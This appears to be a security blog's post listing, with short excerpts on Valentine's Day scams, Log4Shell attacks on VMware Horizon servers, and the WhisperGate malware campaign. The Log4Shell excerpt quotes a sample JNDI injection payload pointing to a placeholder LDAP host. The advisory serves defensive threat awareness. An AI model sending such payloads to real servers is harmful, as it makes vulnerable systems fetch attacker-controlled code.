Blog List

Categories

Breaking up on Valentine’s Day!

Valentine’s Day is approaching fast. And on this day, if anyone is more active than lovers around the world, it is the cybercriminals.  Cybercriminals always look for opportunities to take advantage of oblivious online consumers. From counterfeit gift scams to fake dating apps, their presence is everywhere.  Research from security firm Check Point revealed that over […]


Threat actor groups are targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities

Severity: High Initial Access Broker (IAB) group Prophet Spider and an unknown threat group are actively attempting to exploit the Log4j vulnerability in VMware Horizon. Attack Chain:• In ongoing threat campaigns, the attackers attempt to initiate the attack via Log4Shell payload similar to ${jndi:ldap://example.com} targeting vulnerable VMware Horizon servers.• The attack exploits the Log4Shell vulnerability […]


Threat actors are targeting critical organizations using destructive malware – “WhisperGate”

The threat campaign is referred to as Operation Bleeding Bear. The attacks are currently limited to Ukrainian government agencies and businesses; however, the attack seems to have evolved and sophisticated over time, targeting almost all countries. The threat poses a risk to any government agency, non-profit or enterprise system. The malware campaign has been mapped […]


Top